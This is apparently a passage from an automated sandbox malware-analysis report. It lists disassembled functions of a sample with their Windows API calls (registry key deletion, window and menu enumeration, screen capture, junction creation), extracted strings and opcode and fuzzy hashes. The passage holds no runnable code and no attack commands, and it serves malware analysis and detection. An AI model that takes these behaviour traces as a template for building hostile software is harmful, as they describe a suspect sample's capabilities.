                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00A58641
                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00A58671
                                                                      • DeleteObject.GDI32(?), ref: 00A58699
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00A586AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: d4342909890c7d7a131994673ff055d6cde5b1c88c86fa934c27ada374efd2a6
                                                                      • Instruction ID: 522a1798ad7263413b606fdccbc193f0e60ff1178dac15a87f882fa9cc89a48b
                                                                      • Opcode Fuzzy Hash: d4342909890c7d7a131994673ff055d6cde5b1c88c86fa934c27ada374efd2a6
                                                                      • Instruction Fuzzy Hash: 3241E875600308BFDB11DFA5DC48EAE7BB8FB89722F104158F906EB260DB349946DB60
                                                                      Function 00A314BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00A31502
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00A3150B
                                                                      • VariantClear.OLEAUT32(?), ref: 00A31517
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00A315FB
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00A31657
                                                                      • VariantInit.OLEAUT32(?), ref: 00A31708
                                                                      • SysFreeString.OLEAUT32(?), ref: 00A3178C
                                                                      • VariantClear.OLEAUT32(?), ref: 00A317D8
                                                                      • VariantClear.OLEAUT32(?), ref: 00A317E7
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00A31823
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                      • API String ID: 1234038744-3931177956
                                                                      • Opcode ID: 7caaf15f7e6b5e1611f087d9a3c10bccd6d29333a5a523a96f334aa357802a40
                                                                      • Instruction ID: e3bafa55b712f4ddecfc795ea0c52d4d607133dfa4a6af15130f7cba1b8a7a4a
                                                                      • Opcode Fuzzy Hash: 7caaf15f7e6b5e1611f087d9a3c10bccd6d29333a5a523a96f334aa357802a40
                                                                      • Instruction Fuzzy Hash: 1AD1F271A00215EFDB10EFA5E889B7DB7B5BF84700F14845AF846AB680DB30ED45DB62
                                                                      Function 00A4B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                        • Part of subcall function 00A4C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A4B6AE,?,?), ref: 00A4C9B5
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4C9F1
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA68
                                                                        • Part of subcall function 00A4C998: _wcslen.LIBCMT ref: 00A4CA9E
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A4B6F4
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A4B772
                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 00A4B80A
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A4B87E
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A4B89C
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00A4B8F2
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A4B904
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A4B922
                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00A4B983
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4B994
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 146587525-4033151799
                                                                      • Opcode ID: 76cb0251cd8a108774d38074004cf447206e8cf71960a1f6dfb798d1a53b7659
                                                                      • Instruction ID: bc367b7d4fb45e43d455916410a2553fa24ecf672409969db090de09fb81ec8e
                                                                      • Opcode Fuzzy Hash: 76cb0251cd8a108774d38074004cf447206e8cf71960a1f6dfb798d1a53b7659
                                                                      • Instruction Fuzzy Hash: B3C17D34618201AFD714DF24C495F2ABBE5BFC4318F14855CF49A8B2A2CB75ED46CBA2
                                                                      Function 00A4255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDC.USER32(00000000), ref: 00A425D8
                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00A425E8
                                                                      • CreateCompatibleDC.GDI32(?), ref: 00A425F4
                                                                      • SelectObject.GDI32(00000000,?), ref: 00A42601
                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00A4266D
                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00A426AC
                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00A426D0
                                                                      • SelectObject.GDI32(?,?), ref: 00A426D8
                                                                      • DeleteObject.GDI32(?), ref: 00A426E1
                                                                      • DeleteDC.GDI32(?), ref: 00A426E8
                                                                      • ReleaseDC.USER32(00000000,?), ref: 00A426F3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                      • String ID: (
                                                                      • API String ID: 2598888154-3887548279
                                                                      • Opcode ID: 962cac00f6a21f205a2e3e72e22b120bccdb5088750a4bd8803ed5b509ae8e61
                                                                      • Instruction ID: ef6cbbe1b229dccf9a3fc9c2d7696391cd313243df2d5b4a519eb311b279ff39
                                                                      • Opcode Fuzzy Hash: 962cac00f6a21f205a2e3e72e22b120bccdb5088750a4bd8803ed5b509ae8e61
                                                                      • Instruction Fuzzy Hash: 0261D175D00219EFCF14CFE8D984AAEBBB5FF48310F208529E956A7250E770A951CF64
                                                                      Function 009FDA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ___free_lconv_mon.LIBCMT ref: 009FDAA1
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD659
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD66B
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD67D
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD68F
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6A1
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6B3
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6C5
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6D7
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6E9
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD6FB
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD70D
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD71F
                                                                        • Part of subcall function 009FD63C: _free.LIBCMT ref: 009FD731
                                                                      • _free.LIBCMT ref: 009FDA96
                                                                        • Part of subcall function 009F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000), ref: 009F29DE
                                                                        • Part of subcall function 009F29C8: GetLastError.KERNEL32(00000000,?,009FD7D1,00000000,00000000,00000000,00000000,?,009FD7F8,00000000,00000007,00000000,?,009FDBF5,00000000,00000000), ref: 009F29F0
                                                                      • _free.LIBCMT ref: 009FDAB8
                                                                      • _free.LIBCMT ref: 009FDACD
                                                                      • _free.LIBCMT ref: 009FDAD8
                                                                      • _free.LIBCMT ref: 009FDAFA
                                                                      • _free.LIBCMT ref: 009FDB0D
                                                                      • _free.LIBCMT ref: 009FDB1B
                                                                      • _free.LIBCMT ref: 009FDB26
                                                                      • _free.LIBCMT ref: 009FDB5E
                                                                      • _free.LIBCMT ref: 009FDB65
                                                                      • _free.LIBCMT ref: 009FDB82
                                                                      • _free.LIBCMT ref: 009FDB9A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                      • String ID:
                                                                      • API String ID: 161543041-0
                                                                      • Opcode ID: 9ef609beac75fac2c989c299e2ba2b29606bcd31b3248c22417f591ebf266eb7
                                                                      • Instruction ID: ae66c3670022219bd06e6851a396f0a3feec487c6a13d69f88e477d786d6f4eb
                                                                      • Opcode Fuzzy Hash: 9ef609beac75fac2c989c299e2ba2b29606bcd31b3248c22417f591ebf266eb7
                                                                      • Instruction Fuzzy Hash: A231583164520E9FEB22AF38E945B7AB7EEFF40321F114529E648D7191DB71EC808B24
                                                                      Function 00A2365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00A2369C
                                                                      • _wcslen.LIBCMT ref: 00A236A7
                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00A23797
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00A2380C
                                                                      • GetDlgCtrlID.USER32(?), ref: 00A2385D
                                                                      • GetWindowRect.USER32(?,?), ref: 00A23882
                                                                      • GetParent.USER32(?), ref: 00A238A0
                                                                      • ScreenToClient.USER32(00000000), ref: 00A238A7
                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00A23921
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00A2395D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                      • String ID: %s%u
                                                                      • API String ID: 4010501982-679674701
                                                                      • Opcode ID: e529c446bc74db7a9c8ffbd893dde0755e4455de0b7f9e5427356610e05de952
                                                                      • Instruction ID: efc2fde7ddfea340dd9dcc5abb149071e9922f1092532849ba5e5c58a89131a2
                                                                      • Opcode Fuzzy Hash: e529c446bc74db7a9c8ffbd893dde0755e4455de0b7f9e5427356610e05de952
                                                                      • Instruction Fuzzy Hash: 5F91F572200316AFDB09DF68D894FAAF7E9FF46310F004529F999C6190DB34EA46CB91
                                                                      Function 00A24954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00A24994
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00A249DA
                                                                      • _wcslen.LIBCMT ref: 00A249EB
                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 00A249F7
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00A24A2C
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00A24A64
                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00A24A9D
                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 00A24AE6
                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00A24B20
                                                                      • GetWindowRect.USER32(?,?), ref: 00A24B8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                      • String ID: ThumbnailClass
                                                                      • API String ID: 1311036022-1241985126
                                                                      • Opcode ID: a3c00c1c6862942d300c95cb1bc97636049fe31284c2c607b2ead21a1941a6de
                                                                      • Instruction ID: 47aa791ac01c8440910453e3e30f457e3dbd6ed521b3c10de2b690f505259407
                                                                      • Opcode Fuzzy Hash: a3c00c1c6862942d300c95cb1bc97636049fe31284c2c607b2ead21a1941a6de
                                                                      • Instruction Fuzzy Hash: 9391CE710043159FDB04DF18E985BAA7BE8FF88354F048479FD859A196EB30EE45CBA1
                                                                      Function 00A58D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00A58D5A
                                                                      • GetFocus.USER32 ref: 00A58D6A
                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00A58D75
                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00A58E1D
                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00A58ECF
                                                                      • GetMenuItemCount.USER32(?), ref: 00A58EEC
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00A58EFC
                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00A58F2E
                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00A58F70
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A58FA1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                      • String ID: 0
                                                                      • API String ID: 1026556194-4108050209
                                                                      • Opcode ID: e6715ba01ca97f926dc375b02096e306c27b95aa1a69bc4b705d457813318d1f
                                                                      • Instruction ID: 98ba618b8657c8cad234dfcef34e0b8207f6cbb9818b1dd416621c180ce5a14f
                                                                      • Opcode Fuzzy Hash: e6715ba01ca97f926dc375b02096e306c27b95aa1a69bc4b705d457813318d1f
                                                                      • Instruction Fuzzy Hash: 8E81AF71508301AFDB10CF24C885AAB7BF9FB88755F04091AFD85A7291DB78DD09CBA1
                                                                      Function 00A2DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00A2DC20
                                                                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00A2DC46
                                                                      • _wcslen.LIBCMT ref: 00A2DC50
                                                                      • _wcsstr.LIBVCRUNTIME ref: 00A2DCA0
                                                                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00A2DCBC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                      • API String ID: 1939486746-1459072770
                                                                      • Opcode ID: 40a52490761f9c9f813a4001aa80b760b0c611ee188a3d401acfcb743e0e661e
                                                                      • Instruction ID: 5f7a4f01e90f5e777053c3d3acc8b54c058e402cf1694a707719b410b0246079
                                                                      • Opcode Fuzzy Hash: 40a52490761f9c9f813a4001aa80b760b0c611ee188a3d401acfcb743e0e661e
                                                                      • Instruction Fuzzy Hash: 894113329403107AEB01B775AC07FBF37ACEF85721F10446AF905A6283EB719E0187A5
                                                                      Function 00A4CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A4CC64
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00A4CC8D
                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A4CD48
                                                                        • Part of subcall function 00A4CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00A4CCAA
                                                                        • Part of subcall function 00A4CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00A4CCBD
                                                                        • Part of subcall function 00A4CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A4CCCF
                                                                        • Part of subcall function 00A4CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00A4CD05
                                                                        • Part of subcall function 00A4CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00A4CD28
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00A4CCF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2734957052-4033151799
                                                                      • Opcode ID: a04c15101ec7698f0962d2e16cda030b761c8566dfe5377bd33a38028728f6ce
                                                                      • Instruction ID: deaa6e96e9b3065ac74ee05b94bf1f385f37acf685b1ab8b6e535704b0a5de0b
                                                                      • Opcode Fuzzy Hash: a04c15101ec7698f0962d2e16cda030b761c8566dfe5377bd33a38028728f6ce
                                                                      • Instruction Fuzzy Hash: A4318075902229BFD760DB90DC88EFFBB7CFF45761F000165A909E3154DB349A46DAA0
                                                                      Function 00A33D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A33D40
                                                                      • _wcslen.LIBCMT ref: 00A33D6D
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A33D9D
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00A33DBE
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 00A33DCE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00A33E55
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A33E60
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A33E6B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 1149970189-3457252023
                                                                      • Opcode ID: 801299b061efc85626e02266715758aeb7857fc88588e787913bc980b63ebb91
                                                                      • Instruction ID: 74e2976889ed84807ad573d64b2c618b927f2cfdadeb3fe54b9f3d5141b84329
                                                                      • Opcode Fuzzy Hash: 801299b061efc85626e02266715758aeb7857fc88588e787913bc980b63ebb91
                                                                      • Instruction Fuzzy Hash: A131BE72904309AADB21DBA0DC49FEF77BCFF88751F1040A6F609D6064EB7097858B24
                                                                      Function 00A2E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 00A2E6B4
                                                                        • Part of subcall function 009DE551: timeGetTime.WINMM(?,?,00A2E6D4), ref: 009DE555
                                                                      • Sleep.KERNEL32(0000000A), ref: 00A2E6E1
                                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00A2E705
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A2E727
                                                                      • SetActiveWindow.USER32 ref: 00A2E746
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A2E754
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A2E773
                                                                      • Sleep.KERNEL32(000000FA), ref: 00A2E77E
                                                                      • IsWindow.USER32 ref: 00A2E78A
                                                                      • EndDialog.USER32(00000000), ref: 00A2E79B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
